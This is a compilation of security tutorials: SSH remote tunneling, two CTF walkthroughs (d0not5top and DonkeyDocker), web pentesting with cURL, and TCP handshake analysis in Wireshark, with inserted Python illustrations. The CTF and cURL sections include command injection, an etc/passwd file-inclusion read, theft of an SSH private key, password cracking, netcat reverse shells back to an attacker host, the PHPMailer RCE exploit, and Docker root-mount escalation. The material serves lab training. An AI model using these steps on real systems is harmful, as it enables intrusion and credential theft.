
How to Perform Remote Tunneling

Hello friends! Previously we discussed dynamic tunneling and local tunneling; today we are going to discuss remote tunneling.

Remote tunneling is used when a client machine wants to access a remote system that lies outside its own network.

Example: Your personal laptop (at home) is connected to your office server; currently you are working on a client system (at the office) that is also connected to the office server. If you now want to connect the client system to the laptop in order to read a document, there must be a remote tunnel between them for communication.

Let’s Begin!!
Objective: To establish an HTTP connection between a remote PC and a client on a different network.
Here I have set up my own lab, which consists of three systems on the following networks:
SSH server (two Ethernet interfaces):
·         IP 192.168.0.116, connected to the remote system 192.168.0.100
·         IP 192.168.10.1, connected to the local network system 192.168.10.2
Ubuntu client (local network system) holds IP 192.168.10.2
Remote system (outside network) holds IP 192.168.0.100


The image below shows the network configuration of the SSH server, with its two IPs, 192.168.0.116 and 192.168.10.1, as explained above.


The next image shows the network configuration of the Ubuntu client, with IP 192.168.10.2.


The next image shows the network configuration of the remote desktop, whose IP is 192.168.0.100.


In this tutorial we are demonstrating HTTP tunneling; the HTTP service runs on port 80 of an XAMPP server (on the remote desktop’s localhost).
From the given image you can observe that a WordPress website is running on port 80.


From the SSH server we successfully browsed the WordPress website using the URL http://192.168.0.100/index.html and connected to the remote desktop; since they belong to the same network, each can reach the other for communication.

Similarly, we tried to connect from the Ubuntu client to the remote desktop through the URL http://192.168.0.100/index.html but failed to browse the WordPress website. Since they belong to different networks, the connection is refused here.


Now let’s try to establish a link between the remote desktop and the Ubuntu client using PuTTY.
Use PuTTY to connect to the SSH server (192.168.0.116) on port 22 and follow the steps given below.


Then go to SSH > Tunnels in the left-hand Category column and follow the steps below:
1. Tick the check box “Local ports accept connections from other hosts”.
2. Enter 7000 as the port to forward and select Remote as the connection type.
3. Enter 127.0.0.1:80 as the destination address and click Add.
4. Click Open when everything is set.


Note: If the SSH service is running on the remote desktop, replace port 80 with port 22; this creates a remote SSH tunnel.


This first establishes the connection between the remote PC and the SSH server, which then acts as the link between the remote desktop and the Ubuntu client for the whole communication.


Now open the browser on the Ubuntu client and again try to connect to the remote desktop, this time using the URL http://192.168.0.116:7000/index.html. This opens the WordPress website running on the remote desktop’s localhost, via port 7000 on the SSH server.
Hence we have successfully connected to the remote desktop from the Ubuntu client.
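What the SSH server actually does with the forwarded port, as an added illustration that is not part of the original article: the Python relay below listens on a port (7000 in the lab above) and hands every incoming connection on to a destination service, which is what sshd does with a remote-forwarded port before passing the bytes back over the SSH channel to 127.0.0.1:80 on the remote desktop. It assumes a direct loopback connection in place of the SSH channel, and the demo function uses a constructed echo service in place of the WordPress site. The bind address is the point to notice: binding to 0.0.0.0 is the equivalent of PuTTY’s “Local ports accept connections from other hosts” (OpenSSH honours that request only when sshd has GatewayPorts enabled) and exposes the remote desktop’s service to every host that can reach the SSH server, so bind to 127.0.0.1 unless other hosts genuinely need the tunnel.

```python
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes from src to dst until src reaches EOF, then half-close dst."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _serve(client: socket.socket, dest: tuple) -> None:
    """Open the onward connection for one accepted client and relay both ways."""
    try:
        upstream = socket.create_connection(dest, timeout=5)
    except OSError:
        client.close()  # destination unreachable: drop this client, keep listening
        return
    upstream.settimeout(None)
    threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
    threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()


def start_forwarder(bind_host: str, bind_port: int, dest: tuple) -> int:
    """Listen on bind_host:bind_port and relay each connection to dest.

    bind_host "127.0.0.1" keeps the forwarded port private to the SSH server
    itself; "0.0.0.0" is what PuTTY's "Local ports accept connections from
    other hosts" asks for (sshd grants it only with GatewayPorts enabled) and
    makes the tunnelled service reachable from every host that can reach this
    machine. Returns the bound port, which matters when bind_port is 0."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((bind_host, bind_port))
    listener.listen(16)

    def accept_loop():
        while True:
            try:
                conn, _ = listener.accept()
            except OSError:
                break
            _serve(conn, dest)

    threading.Thread(target=accept_loop, daemon=True).start()
    return listener.getsockname()[1]


def _echo_service() -> int:
    """Constructed stand-in for the web server on the remote desktop's loopback:
    answers one connection by echoing the request back, then exits."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def once():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(conn.recv(4096))
        srv.close()

    threading.Thread(target=once, daemon=True).start()
    return srv.getsockname()[1]


def roundtrip_demo(request: bytes) -> bytes:
    """Run the whole chain on loopback: client -> forwarded port -> service."""
    service_port = _echo_service()
    tunnel_port = start_forwarder("127.0.0.1", 0, ("127.0.0.1", service_port))
    with socket.create_connection(("127.0.0.1", tunnel_port), timeout=5) as client:
        client.sendall(request)
        reply = b""
        while True:
            chunk = client.recv(4096)
            if not chunk:
                break
            reply += chunk
    return reply


if __name__ == "__main__":
    # Constructed request, shaped like the Ubuntu client's browser request above.
    req = b"GET /index.html HTTP/1.0\r\nHost: 192.168.0.116:7000\r\n\r\n"
    print(roundtrip_demo(req).decode())
    # A long-running relay would call start_forwarder("127.0.0.1", 7000, ("127.0.0.1", 80))
    # and then sleep in a loop while the daemon threads do the work.
```

Run it directly and the constructed request comes back unchanged through the forwarded port, which is exactly the path the browser on the Ubuntu client takes to 192.168.0.116:7000 in the lab.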


Hack the d0not5top VM (CTF Challenge)

This time we are going to solve a fun vulnerable lab, d0not5top 1.2. To do so we are going to download the VM from here.
The credit for developing this VM goes to 3mrgnc3, who has hidden 7 flags inside this lab as a challenge for hackers.

Let’s Breach!!!
As always, let us start by finding the IP of the VM (here I have it at 192.168.1.113, but you will have to find your own).

netdiscover


Next we run nmap
nmap -sV 192.168.1.113


Now, visit the IP in the Browser.

Since we didn’t find anything interesting when exploring the IP in the browser, I am now going to scan the web content using dirb in Kali Linux.

dirb http://192.168.1.113


As you can observe from the above image, I have highlighted a URL that points to the control panel of the website; let’s open 192.168.1.113/control in the browser. Yes, it is a DNS control panel, but I didn’t find any clue for the 1st flag on this web page.


After that, move to its view-source page and notice FL46_1, which indicates the 1st flag.

Wonderful!! Successfully found the 1st flag.


From the dirb scan results we found many web directories on this machine, so next I chose the 192.168.1.113/control/js directory. In it I found a file, README.MadBro. It opens as shown below.

Here we found binary code that has to be converted to decimal. On conversion you will find FL46_2:30931r42q2svdfsxk9i13ry4f2srtr98h2

Great!! Successfully got the 2nd flag.


Now, for the third flag, we will use netcat in very verbose mode on port 25, which hosts the smtpd service (this can be found by doing an aggressive nmap scan on the IP):
nc -vv 192.168.1.113 25
Here we found hexadecimal code that has to be converted to text.


Great!! Successfully got the 3rd flag as well.


On the URL where we found the second flag there is an instruction written in leet. It reads: M4K3 5UR3 2 S3TUPYOUR /3TC/HO5TS N3XT TIM3 L0053R… 1T’5 D0Not5topMe.ctf!!! So we will go to /etc/hosts and add an entry as shown in the given image.

Now open donot5topme.ctf in the browser as shown and click on Register at the end of the web page.


As you can observe, we didn’t find any clue on this web page, so open the view-source page.



In the page source we found the link shown in the highlighted text.


Some kind of encoded web page opened, so I searched Google for this encoding. It is known as Brainfuck.

So we will decode it. Here we got FL46_4.

Successfully found the 4th flag.


Now move back to d0not5topme.ctf. We click on Register and then on “I agree to these terms”, which takes us to the registration page. Here we click on Board Administration, which opens a prompt asking which client should open the mailto link; here I chose Gmail.


Here I found another domain name, “Megusta@G4M35.ctf”.



Now let’s add G4M35.ctf into /etc/hosts as we did before and click on Save.


Before opening this domain in the browser, I got a game to play. Although you can get the next clue by playing too, I thought of a more technical approach and opened this web page with Inspect Element. Select the Debugger tab; here I found game.js, and inside the Game_Over script I found the next clue, “/H3X6L4m3”.


Opening the complete link “g4m35.ctf/H3X6L4m3” gave another new game.


Again we can play and discover the next clue/flag, but we went for a more technical approach and ran dirb to look through its directories.

dirb http://g4m35.ctf/H3x6L64m3/ /usr/share/wordlists/dirb/big.txt

From the result I have highlighted http://g4m35.ctf/H3x6L64m3/textures/ for further enumeration.


Now I opened this textures directory in the browser; here I opened the skybox directory and then the dawnclouds directory, and found the file nz.jpg as shown.


Now open this image and get the octal code.


When I decoded this code I found FL46_5.
I have captured the 5th flag as well!!


Now get back to the second game, http://g4m35.ctf/H3x6L64m3, and open it with Inspect Element. Select the Debugger tab; here I found Gameplay.js and got another CTF domain, “t3rmln4l.ctf”, as shown below.


Now let’s add t3rmln4l.ctf into /etc/hosts as we did before and click on Save.


As before, when opening this domain in the browser I got a terminal that asks for a password. After trying a bunch of commands, I found that grep* runs on this terminal, and for authentication I entered the name of the CTF as the password, i.e. t3rm1a4l.ctf, and found another CTF domain, “M36u574.ctf”.


Now let’s add M36u574.ctf into /etc/hosts as we did before and click on Save.


As before, when you open this domain in the browser you get a slideshow of Megusta images. Out of the different images I downloaded kingmegusta.jpg.


Now we run exiftool on this image; here I got some code in the Comment field, as shown below.


Now convert the code to text, which gives the code shown in the image. Copy this code; it is base64 encoded.


Then I created a text file on /root/Desktop (name it anything you want) and pasted the above decoded text into this file.


Now run John the Ripper on this file as shown:
john --wordlist=/usr/share/wordlists/rockyou.txt donotstop
Here I found the user MeGustaKing and the password ********** (10 times *).


Now, using this username and password combination, we log in over SSH. Here we get a code and another username and password combination, i.e. burtieo:Lets you update your FunNotes and more! But first let’s decode that highlighted code.


Copy and paste the above code into it. It is base64 encoded; after decoding it we found that the result is an MD5 hash.
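The clues in this walkthrough were converted by hand (binary for the 2nd flag, hexadecimal for the 3rd, octal for the 5th, base64 for the 6th). As an added example that is not part of the original post, the Python helper below recognises those encodings, peels them off one layer at a time and stops when the result is plain text; it cannot reverse the final MD5, because that is a hash rather than an encoding. The sample strings it is run on are constructed for the demonstration and are not the VM’s flag values.

```python
import base64
import re


def _printable(data: bytes):
    """Return the text when every byte decodes to printable UTF-8, else None."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def decode_step(text: str):
    """Remove one layer of encoding; return (encoding, decoded) or None.

    Candidates are tried from the most specific shape to the least, and the
    first one whose output is printable text wins, so '106 114' is read as
    octal before decimal and '01000110' as binary before hex."""
    stripped = text.strip()
    tokens = stripped.split()
    compact = re.sub(r"[\s:]", "", stripped)  # tolerate 'aa:bb' and 'aa bb' hex
    candidates = []
    if tokens and all(re.fullmatch(r"[01]{8}", t) for t in tokens):
        candidates.append(("binary", bytes(int(t, 2) for t in tokens)))
    if tokens and all(re.fullmatch(r"[0-3][0-7]{2}", t) for t in tokens):
        candidates.append(("octal", bytes(int(t, 8) for t in tokens)))
    if tokens and all(re.fullmatch(r"[0-9]{1,3}", t) and int(t) < 256 for t in tokens):
        candidates.append(("decimal", bytes(int(t) for t in tokens)))
    if compact and len(compact) % 2 == 0 and re.fullmatch(r"[0-9a-fA-F]+", compact):
        candidates.append(("hex", bytes.fromhex(compact)))
    if len(compact) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", compact):
        try:
            candidates.append(("base64", base64.b64decode(compact, validate=True)))
        except ValueError:  # binascii.Error is a ValueError subclass
            pass
    for name, raw in candidates:
        plain = _printable(raw)
        if plain is not None:
            return name, plain
    return None


def peel(text: str, max_layers: int = 6):
    """Decode layer by layer until the result no longer looks encoded.

    Returns the list of (encoding, text) steps; the last text is the plaintext.
    A hash such as MD5 is never recognised, so peeling stops there."""
    steps = []
    current = text
    for _ in range(max_layers):
        step = decode_step(current)
        if step is None:
            break
        steps.append(step)
        current = step[1]
    return steps


if __name__ == "__main__":
    # Constructed sample: a base64 string wrapped in 8-bit binary groups.
    sample = " ".join(format(b, "08b") for b in b"Rkw0Nl9YOnNhbXBsZQ==")
    for encoding, decoded in peel(sample):
        print("%-7s -> %s" % (encoding, decoded))
```

Each candidate is only accepted when its output is printable, which is what keeps a run of hex-looking digits from being misread once the real layer underneath has already been removed.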


Great! It is the 6th Flag.


As mentioned above, in the previous SSH login we got the username burtieo, and its password is the text written above it, i.e. Lets you update your FunNotes and more!
Now let’s log in over SSH using this combination:
Username: burtieo and Password: Lets you update your FunNotes and more!


This opens an rbash shell; rbash restricts some of the features of the bash shell.


So, first run the following command:
suedoh -l
And then we run the command:
suedoh /usr/bin/wmstrt


Using the nmap command I found that port 10000 is open.


But this port only stays open for 20 seconds; we can make it stay open longer using a “for loop” as shown.


Now let’s run Metasploit and use the module named file_disclosure:

msf > use auxiliary/admin/webmin/file_disclosure
msf auxiliary(file_disclosure) > set rhost 192.168.1.113
msf auxiliary(file_disclosure) > set ssl true
msf auxiliary(file_disclosure) > set rpath /root/.ssh/id_rsa
msf auxiliary(file_disclosure) > exploit

I found the RSA Private Key as shown.

Now copy and paste this private key into a file named id_rsa and then run John the Ripper:
ssh2john id_rsa > ignite
john --wordlist=/usr/share/wordlists/rockyou.txt ignite
This gave the root password, i.e. “gustateamo”.


Now I restricted the permissions on id_rsa with chmod 700 and logged in over SSH as root with the password gustateamo, as shown below.


Now type the following command:
ls
You can observe from the given image that it contains two files; let’s open one of them:
cat L45T_fl46.pl
Here it gave the message to use L45T_fl46.pl.


Now use the netcat command to listen for a connection from the target on port 1234:
nc -lvp 1234


Now, in the D0Not5top terminal, we run the file L45T_fl46.pl with the IP 192.168.0.7 (Kali Linux IP), as given below:
./L45T_fl46.pl 192.168.0.7 1234


On the attacker system you will find that netcat has received a connection from the target system. The highlighted text indicates FL46_7.
Congratulations!! It is the 7th flag.
Solving this lab was a fun and learning experience.


Web Application Penetration Testing with cURL

cURL is a computer software project providing a library and command-line tool for transferring data using various protocols.

CURL is simply awesome because of the following reasons...

·         cURL is an easy-to-use command-line tool to send and receive files, and it supports almost all major protocols in use (DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMTP, SMTPS, TELNET and TFTP).
·         Can be used inside your shell scripts with ease
·         Supports features like pause and resume of downloads
·         It has around 120 command-line options for various tasks
·         It runs on all major operating systems (more than 40)
·         Supports cookies, forms and SSL
·         Both the curl command-line tool and the libcurl library are open source, so they can be used in any of your programs
·         It supports configuration files
·         Multiple uploads with a single command
·         Progress bar, rate limiting, and download time details
·         IPv6 support

curl comes installed by default in most distributions. If you do not have the curl tool installed, it is a single apt-get (apt-get install curl) or yum (yum install curl) command away.

For this tutorial we used “Web for Pentester” as the target for the curl commands. As you know, this lab is vulnerable to many web-based attacks, so we chose curl as our weapon of attack.


Let’s begin!!



Command Injection Exploitation
You must be aware of the command injection vulnerability, which allows an attacker to execute arbitrary OS commands. Type the following command to list the directory on the targeted system:

curl "http://192.168.0.16/commandexec/example1.php?ip=127.0.0.1;ls"


From the image below you can observe that it executes the ping command as well as the ls command; as a result we found three PHP files in this directory.


Download File from URL
curl is also used to download data from any website or host; the following command downloads putty.exe from the website:
curl -O https://the.earth.li/~sgtatham/putty/latest/putty.exe


HTTP Headers
curl is used to identify the allowed HTTP methods, which helps in HTTP verb tampering. Type the following command:
curl -v -X OPTIONS http://www.google.com

From the image below you can see that only the GET and HEAD methods are allowed on Google.


File Inclusion
This vulnerability allows an attacker to include a file from the web server; use the following curl command to exploit it:
curl "http://192.168.0.16/fileincl/example.php?page=etc/passwd"


Hence you can observe that we retrieved the contents of etc/passwd.


HTTP Authentication
HTTP authentication is used to give the server the user’s username and password so that it can verify that you are allowed to send the request you are sending. curl supports HTTP Basic authentication. Now type the following command, which supplies the username and password required to log in to the website through curl:

curl --data "uname=test&pass=test" http://testphp.vulnweb.com/userinfo.php


If you look at the image below carefully you can observe that the returned code contains the user’s information inside a table, such as email ID, phone number, address, etc.


File Upload
An upload option on a website allows uploading an image or text file to that website, for example uploading an image to Facebook. Use the following curl command to upload putty.exe to the targeted system:
curl -F 'image=@/root/Desktop/putty.exe' http://192.168.0.16/upload/example1.php


Great! The highlighted text points to the directory “/upload/images/putty.exe”, where the file has been successfully uploaded.


Open the above directory in the browser as 192.168.0.16/upload/images/

Awesome! From the image below you can see that putty.exe has been uploaded.


Analyzing TCP Headers using Wireshark

From Wikipedia:
TCP is used by most applications on the internet, including the World Wide Web (WWW), e-mail, File Transfer Protocol, Secure Shell, peer-to-peer file sharing, and streaming media applications.

3 Way Handshakes

The handshaking process takes place to establish the rules for communication when a computer begins communicating with a foreign device. When a computer communicates with another device like a modem, printer, or network server, it needs to handshake with it to establish a connection.
·         The client sends a TCP packet to the server with the SYN flag set.
·         The server responds to the client’s request with the SYN and ACK flags set.
·         The client completes the connection by sending a packet with the ACK flag set.


Structure of TCP segment

The Transmission Control Protocol accepts data from a data stream, splits it into chunks, and adds a TCP header, creating a TCP segment. A TCP segment only carries the sequence number of the first byte in the segment.

A TCP segment consists of a segment header and a data section. The TCP header contains 10 mandatory fields and an optional extension field.





Source Port: The 16-bit source port number; identifies the sending port.
Destination Port: The 16-bit destination port number; identifies the receiving port.
Sequence Number: The sequence number of the first data byte in this segment. If the SYN control bit is set, the sequence number is the initial sequence number (n) and the first data byte is n+1.
Acknowledgment Number: If the ACK control bit is set, this field contains the value of the next sequence number that the receiver is expecting to receive.
Data Offset: The number of 32-bit words in the TCP header. It indicates where the data begins.
Reserved: Six bits reserved for future use; must be zero.
Flags: CWR, ECE, URG, ACK, PSH, RST, SYN, FIN
Window: Used in ACK segments. It specifies the number of data bytes, beginning with the one indicated in the acknowledgment number field, that the receiver (the sender of this segment) is willing to accept.
Checksum: The 16-bit one's complement of the one's complement sum of all 16-bit words in a pseudo-header, the TCP header, and the TCP data. While computing the checksum, the checksum field itself is considered zero.
Urgent Pointer: Points to the first data octet following the urgent data. Only significant when the URG control bit is set.
Options: Just as in the case of IP datagram options, an option can be either a single byte containing the option number, or a variable-length option (option number, option length, option data).
Padding: The TCP header padding is used to ensure that the TCP header ends and the data begins on a 32-bit boundary. The padding is composed of zeros.






Different Types of TCP Flags

TCP flags are control bits within the TCP header that specify particular connection states or information about how a packet should be handled. The flag field of a TCP segment helps us understand the function and purpose of any packet in the connection.


List of flags and their description:
CWR: Congestion Window Reduced. Set by the sending host to show that it received a TCP segment with the ECE flag set.
ECE: ECN-Echo. Indicates that the TCP peer is ECN capable during the 3-way handshake.
URG: Indicates that the urgent pointer field is significant in this segment.
ACK: Indicates that the acknowledgment field is significant in this segment.
PSH: Push function, to transfer data.
RST: Resets the connection.
SYN: Synchronizes the sequence numbers.
FIN: No more data from the sender.


Analyzing a TCP Packet Using Wireshark

Having read the “structure of a TCP segment” and its fields above, we are now going to elaborate on them with the help of Wireshark. We assume the reader is familiar with the 7 layers of the OSI model, so that the TCP packet analysis is clearer.

From the image below you can see that we sniffed the network in order to capture TCP packets; it clearly shows time, source IP, destination IP, protocol, packet length and information.

As I said above, if you are familiar with the OSI model you can see it shows three OSI layers: layer 2 (Ethernet), layer 3 (Internet Protocol version 4) and layer 4 (Transmission Control Protocol (TCP)).
Now let’s analyze layer 4 and compare the theory above with the image below. You can see I have underlined all the fields of the TCP segment. Now read the following information about the TCP packet.

Source Port: 58302
Destination Port: 80
Sequence number: 0
Acknowledgment number: 0
Flags: SYN
Window size value: 29200
Checksum: unverified
Urgent Pointer: 0
Option: 20 bytes

The SYN (synchronize) flag is the TCP flag set to start a TCP connection for the “3-way handshake”; the sequence number and acknowledgment number are 0.

From the image below you can see that the expanded flags field shows only one flag, SYN, set between the source port and destination port; the rest of the flags are not set at this moment. Hence the control bit is 1 for each flag that is set in the TCP connection and otherwise remains zero.
Packets with the SYN flag set can also be used to perform a SYN flood and a SYN scan.

As I explained above for the three-way handshake, the client first sends a request with the SYN flag, after which the server responds to the client’s request with the SYN and ACK flags set. From the following information we observe the same sequence of packets between client and server; here the sequence number is 0 and the acknowledgment number is 1.

Source Port: 58302
Destination Port: 80
Sequence number: 0
Acknowledgment number: 1
Flags: SYN, ACK
Window size value: 42408
Checksum: unverified
Urgent Pointer: 0
Option: 12bytes

From the expanded flags field you can observe that this time two flags, SYN and ACK, are set; the rest remain unset, i.e. zero, and the control bit is 1 for both flags. This is the 2nd step of the “3-way handshake”.


From the following information we find that this time the sequence number and acknowledgment number are both 1, and the client completes the connection by sending a packet with the ACK flag set. Now the TCP connection has been established between client and server.

Source Port: 58302
Destination Port: 80
Sequence number: 1
Acknowledgment number: 1
Flags: ACK
Window size value: 229
Checksum: unverified
Urgent Pointer: 0
Option: 12bytes

From the image below you can observe that the control bit is 1 for the acknowledgement flag; this is the third step required for the “3-way handshake” between source port and destination port.
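To tie the field layout, the checksum rule and the three-way handshake together, here is an added Python example (not code from the original article) that builds and parses raw TCP segments with the standard library. The constructed capture mirrors the three segments above: ports 58302 and 80, window sizes 29200, 42408 and 229, a 20-byte option block on the SYN and 12-byte blocks on the other two. The IP addresses are sample values, and the sequence numbers are small raw numbers where Wireshark displays them relative to the initial sequence number as 0 and 1. The checksum is verified the way a receiver does it: summing the pseudo-header, header and data with the checksum field left in place must give a complement of zero.

```python
import socket
import struct

# Flag bits of the 8-bit flags field, least significant bit first.
FLAG_NAMES = ["FIN", "SYN", "RST", "PSH", "ACK", "URG", "ECE", "CWR"]


def ones_complement_sum(data: bytes) -> int:
    """16-bit one's complement sum with end-around carry (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"  # an odd trailing octet is padded with zero
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def tcp_checksum(src_ip: str, dst_ip: str, segment: bytes) -> int:
    """Checksum over the IPv4 pseudo-header plus the TCP header and data.

    On a segment whose checksum field already holds the right value the
    result is 0, which is the receiver's verification rule."""
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, 6, len(segment)))  # zero, protocol 6, TCP length
    return (~ones_complement_sum(pseudo + segment)) & 0xFFFF


def build_tcp(src_ip, dst_ip, sport, dport, seq, ack, flags, window,
              options=b"", payload=b""):
    """Assemble a segment; options are zero-padded to a 32-bit boundary."""
    options += b"\x00" * (-len(options) % 4)
    data_offset = (20 + len(options)) // 4  # header length in 32-bit words
    flag_bits = sum(1 << FLAG_NAMES.index(f) for f in flags)
    header = struct.pack("!HHIIBBHHH", sport, dport, seq, ack,
                         data_offset << 4, flag_bits, window, 0, 0)
    segment = header + options + payload  # checksum field is zero while computing
    csum = tcp_checksum(src_ip, dst_ip, segment)
    return segment[:16] + struct.pack("!H", csum) + segment[18:]


def parse_tcp(segment: bytes) -> dict:
    """Decode the ten mandatory header fields, the option bytes and the payload."""
    if len(segment) < 20:
        raise ValueError("truncated TCP header")
    (sport, dport, seq, ack, off_res, flag_bits,
     window, checksum, urg) = struct.unpack("!HHIIBBHHH", segment[:20])
    header_len = (off_res >> 4) * 4
    if header_len < 20 or header_len > len(segment):
        raise ValueError("bad data offset: %d bytes" % header_len)
    return {
        "src_port": sport, "dst_port": dport, "seq": seq, "ack": ack,
        "header_len": header_len, "reserved": off_res & 0x0F,
        "flags": [n for i, n in enumerate(FLAG_NAMES) if flag_bits & (1 << i)],
        "window": window, "checksum": checksum, "urgent_pointer": urg,
        "options": segment[20:header_len], "payload": segment[header_len:],
    }


def handshake_ok(syn: dict, synack: dict, ack: dict) -> bool:
    """True when the three segments form SYN, SYN/ACK, ACK with matching numbers."""
    wrap = 0xFFFFFFFF
    return (syn["flags"] == ["SYN"]
            and sorted(synack["flags"]) == ["ACK", "SYN"]
            and synack["ack"] == (syn["seq"] + 1) & wrap
            and ack["flags"] == ["ACK"]
            and ack["seq"] == (syn["seq"] + 1) & wrap
            and ack["ack"] == (synack["seq"] + 1) & wrap)


# Constructed handshake: ports, window sizes and option lengths follow the
# capture in the article; addresses are sample values (TEST-NET range) and the
# sequence numbers are raw (Wireshark shows them relative to the ISN as 0/1).
CLIENT, SERVER = "192.168.1.10", "203.0.113.80"
SYN_OPTS = bytes.fromhex("020405b4" "0402" "080a0001e24000000000" "01" "030307")  # MSS, SACK-OK, TS, NOP, WS = 20 bytes
TS_OPTS = bytes.fromhex("0101" "080a0001e2410001e240")  # NOP, NOP, timestamps = 12 bytes
CAPTURE = [
    (CLIENT, SERVER, build_tcp(CLIENT, SERVER, 58302, 80, 1000, 0, ["SYN"], 29200, SYN_OPTS)),
    (SERVER, CLIENT, build_tcp(SERVER, CLIENT, 80, 58302, 5000, 1001, ["SYN", "ACK"], 42408, TS_OPTS)),
    (CLIENT, SERVER, build_tcp(CLIENT, SERVER, 58302, 80, 1001, 5001, ["ACK"], 229, TS_OPTS)),
]


def verify_capture(capture):
    """Check every checksum and the handshake order; return the parsed segments."""
    parsed = []
    for src, dst, seg in capture:
        if tcp_checksum(src, dst, seg) != 0:
            raise ValueError("checksum mismatch in segment from %s" % src)
        parsed.append(parse_tcp(seg))
    if not handshake_ok(*parsed):
        raise ValueError("segments do not form a three-way handshake")
    return parsed


if __name__ == "__main__":
    for p in verify_capture(CAPTURE):
        print("%d -> %d  %-8s seq=%d ack=%d hdr=%dB win=%d" % (
            p["src_port"], p["dst_port"], "+".join(p["flags"]),
            p["seq"], p["ack"], p["header_len"], p["window"]))
```

The data offset of 10 words on the SYN (40-byte header) and 8 words on the other two (32 bytes) is where Wireshark's “Option: 20 bytes” and “Option: 12 bytes” come from; the checksum check is the step Wireshark skips when it reports “unverified”, and a flipped bit anywhere in the header or data makes it fail.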


Once the TCP 3-way handshake is established, data can be transferred between client and server; as you can see from the last image, it also shows the 7th layer, Hypertext Transfer Protocol, for the data transfer.


Source Port: 58302
Destination Port: 80
Sequence number: 1
Acknowledgment number: 1
Flags: PUSH, ACK
Window size value: 229
Checksum: unverified
Urgent Pointer: 0
Option: 12bytes

The push function and the PUSH flag are used to move the data forward from the sending user to the receiving user. In order to permit applications to read from and write to the socket at any time, buffers are implemented on both sides of a TCP connection.


Here you can observe that the control bit is set to 1 for the PUSH and ACK flags; as a result a new layer opens for data transfer between the sender application and the receiver application.

When the data packet is expanded we find HTTP header details such as:
Host: google.com
User-Agent: Mozilla/5.0
Finally, the different types of cookie can be observed in the image below.

Hack the Donkey Docker (CTF Challenge)

Today we are going to solve a fun vulnerable lab, DonkeyDocker; download this VM from here.
The credit for developing this VM goes to Dennis Herrmann, who has hidden 3 flags inside this lab as a challenge for hackers.
Let’s Breach!!!
Let us start by finding the IP of the VM (here I have it at 192.168.1.120, but you will have to find your own).

netdiscover


Use the nmap command for port enumeration:
nmap -sV 192.168.1.120
As you can see, port 22 for SSH and port 80 for HTTP are open, so let’s explore port 80 through the browser.

After browsing I found three tabs, Home, About and Contact, but didn’t find any clue for the next step, so I decided to scan the target’s directories with a dirb scan.


Now open the terminal in Kali Linux and run dirb against the target.
From the scan result I chose the highlighted directory http://192.168.1.120/mailer/examples/ for further enumeration.

Here we get to know that PHPMailer is running on the targeted system. Let’s try to find out its version.
After browsing a bit about PHPMailer, we came to know how to get its version:
http://192.168.1.120/mailer/VERSION
We got the version of PHPMailer, i.e. 5.2.16.
From Google we came to know that PHPMailer 5.2.16 is vulnerable to remote code execution (Python exploit) {CVE-2016-10033}, exploiting PHPMailer with a back connection (reverse shell) from the target. You can download this exploit from here.


After downloading the Python file, make the following changes:
1. Open the file and add “# coding: utf-8” at the beginning.
2. Set target = ‘http://192.168.1.20/contact’ (victim IP); this is the location where backdoor.php gets uploaded on the victim’s machine automatically.
3. Give the attacker IP, 192.168.1.101 (Kali Linux IP), inside the payload code.
4. After making the above changes, save it.
Now start netcat on the same port to which the payload is bound, i.e. 4444, to establish the reverse connection from the target:
nc -lvp 4444
Before you run the Python script, type the following command in a new terminal to install the exploit’s dependency:
pip2 install requests_toolbelt
Now run the script in order to exploit the target, as shown in the given image:
python 40974.py
Move back to the netcat shell; here you will find that it is connected to the victim but not able to access a proper shell of the victim system, so type the given command in order to access the victim shell properly, as shown in the image:
python -c 'import pty; pty.spawn("/bin/bash")'

Once you have the victim shell, type the following commands to find the hidden flag:
ls
cat main.sh
Here we found that the user smith has a directory containing flag.txt; let’s head towards this directory:
cd home
ls
On opening the smith directory we got Permission denied.
Then we used su smith instead of sudo, because sudo is not accessible in this shell:
su smith
For the password we tried “smith” and successfully got smith’s shell.

Now we are inside smith’s shell; type the following commands to get the flag:
ls
cd /home/smith
ls
flag.txt
cat flag.txt

Great!! Successfully captured the 1st flag.
Moreover, if you look at the given image you will find the next clue, “I like 1984 written by Geoge ORWELL”; it could be that this refers to a user name with the 2nd flag inside it.

Type the following command to view the full directory listing:
ls -al
We got authorized_keys, id_ed25519 and id_ed25519.pub in the .ssh directory; let’s open these keys one by one:
cat authorized_keys
cat id_ed25519
cat id_ed25519.pub
In id_ed25519 we get the OpenSSH private key, and this key is authorized for orwell@donkeydocker. Now copy the private key and paste it into a text file.

We saved this private key in a file named id_rsa, as shown in the image below.
Now log in over SSH with:
ssh -i id_rsa orwell@192.168.1.120
Here you will be greeted by the Donkey Docker shell. Now check the directory listing for the 2nd flag:
ls
flag.txt
cat flag.txt

Nice!! Successfully got the 2nd flag.

Now for the last flag we tried a lot of different tricks but nothing seemed to get through; you can read an article from here which helps in finding the 3rd flag.
Type the following command:
docker run -v /root:/hack -t debian:jessie /bin/sh -c 'ls -al /hack'
This runs a debian:jessie container and gives it root access through privilege escalation; check all the directory listings inside it, where we get the flag.txt file.

Now, to open this file we use the previous command with a slight modification, as shown:
docker run -v /root:/hack -t debian:jessie /bin/sh -c 'cat /hack/flag.txt'
Awesome, we got the 3rd flag as well.

Bypass UAC in Windows 10 using bypass_comhijack Exploit

